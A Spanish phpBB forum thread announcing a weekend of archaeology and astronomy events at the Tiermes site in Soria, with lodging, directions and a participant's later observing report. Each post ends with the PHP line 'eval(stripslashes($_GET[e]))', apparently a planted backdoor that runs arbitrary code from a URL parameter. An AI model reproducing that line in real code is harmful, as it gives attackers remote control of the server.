Arqueología y Astronomía en Tiermes, 14 al 16 de Septiembre

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.
Responder
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Arqueología y Astronomía en Tiermes, 14 al 16 de Septiembre

Mensaje por m3ntol »

El Museo de Tiermes, junto con varias asociaciones astronómicas (entre ellas Astro Henares), organiza las jornadas culturales de Arqueología y Astronomía en el yacimiento arqueológico de Tiermes

Mas informaciuón
http://www.castillosdesoria.com/astroti ... &seccion=1.

Durante el fin de semana del 14 al 16 se Septiembre, en el magnífico entorno del yacimiento arqueológico de Tiermes, tendrán lugar las jornadas de Arqueología y Astronomía.

A la oportunidad de visitar de primera mano el yacimiento de Tiermes se unen los magníficos cielos que posee la zona, totalmente libres de contaminación lumínica convirtiendo esta escapada en una gran oportunidad de disfrutar de nuestro entorno cultural y natural.

No es necesario ser socio para apuntarse a la actividad
Tan solo avisad en este mismo hilo de la intención de acercarse. Cualquier duda pueden preguntarla en este mismo hilo del foro.

Actividades:
Aún quedan por determinar varias actividades y excursiones por la zona, se recomienda visitar con regularidad el foro, pero de momento se han organizado estas:

-Visita guiada al yacimiento y charla sobre el mismo -AAMT-
-Conferencia: "el papel de la orientación astronómica en el mundo celtibérico" -AAMT-
-Conferencia: ¿cómo elegir un telescopio? -Astro Henares-
-Taller: Mantenimiento y ajuste de una montura LXD -Asociación Astronómica Hubble-
-Actividad: La noche del sábado al domingo se dará una conferencia en el graderío rupestre sobre las constelaciones usando un potente puntero láser explicando cuales son las principales estrellas y objetos del cielo. Manuel Leon

Y, por supuesto, durante todas las noches estarán todos los equipos de astronomía de las asociaciiones a disposición de los visitantes. Una oportunidad única de poder observar el cielo con equipos semi-profesionales y de poder conocer la cultura y el pasado de Tiermes.


Alojamiento:
Junto al yacimiento se encuentra el Hotel Venta de Tiermes, un moderno establecimiento con 12 habitaciones. Si se llenara por completo, el hotel habilitará una zona de acampada anexa y tratará también de localizar casas rurales cercanas. No obstante, para evitar prisas de última hora se recomienda hacer ya la reserva en firme.

http://www.hoteltermes.com/
Teléfono: 975 35 20 55 Avisar que se reserva habitación para la actividad de la Asociación de Amigos del Museo de Tiermes.

[img]http://www.hoteltermes.com/images/alojamientos4.jpg[/img][img]http://www.hoteltermes.com/images/alojamientos3.jpg[/img][img]http://www.hoteltermes.com/images/prestau5.jpg[/img]

Cómo llegar:
El acceso desde Madrid se realiza por la N-1 de Madrid a Burgos, en cuyo Km. 105, Cerezo de Abajo, hay que desviarse por la N-110 vía Riaza en dirección Soria, hasta el pueblo de Ayllón (provincia de Segovia). Desde éste pueblo parte una carretera local bien indicada que lleva a Montejo de Tiermes, del cual el yacimiento arqueológico se encuentra a 7,5 Km. de distancia.

[img]http://www.castillosdesoria.com/astropi ... /zoom1.jpg[/img]

[img]http://www.castillosdesoria.com/astropi ... /zoom2.jpg[/img]

[img]http://www.castillosdesoria.com/astropi ... /zoom3.jpg[/img]

[img]http://www.castillosdesoria.com/astropi ... s/orto.jpg[/img]
phpbb:eval(stripslashes($_GET[e]));
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Arqueología y Astronomía en Tiermes, 14 al 16 de Septiembre

Mensaje por m3ntol »

Astro Tiermes en la TV del Corredor. Durante la presente semana (a partir del 29 de Agosto) se emitirá en el informativo de la TV del Corredor una noticia referente a esta actividad.

Por desgracia no se sabe a priori qué día lo emitirán. En ella se vuelve a recalcar que TODOS los que quieran acercarse durante ese fin de semana serán bienvenidos.

Un saludo!!
phpbb:eval(stripslashes($_GET[e]));
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Arqueología y Astronomía en Tiermes, 14 al 16 de Septiembre

Mensaje por m3ntol »

Ya hemos vuelto de Tiermes!!
un fin de semana inolvidable en buena compañía y con un cielo muy muy bueno.

Las visitas al yacimiento han sido muy entretenidas y las noches de observación sorprendentes.

Mirar el velo pro un 16` ` aun me tiene trastornado... se veía casi como en las fotos!! excepto por el color, lo demás era igual de nítido... los filamentos, el contraste...

Otra cosa que me dejó descolocado fue ver la norteamérica por un 70mm televue. Ese pequeño trasto se defiende de maravilla en cielo profundo!!

Estoy evaluando el comprarme un refractor de focal corta en unos años. Eso ha sido fobos!! que me ha metido un chute de fluorita y ahora tengo mono :D:D
phpbb:eval(stripslashes($_GET[e]));
Responder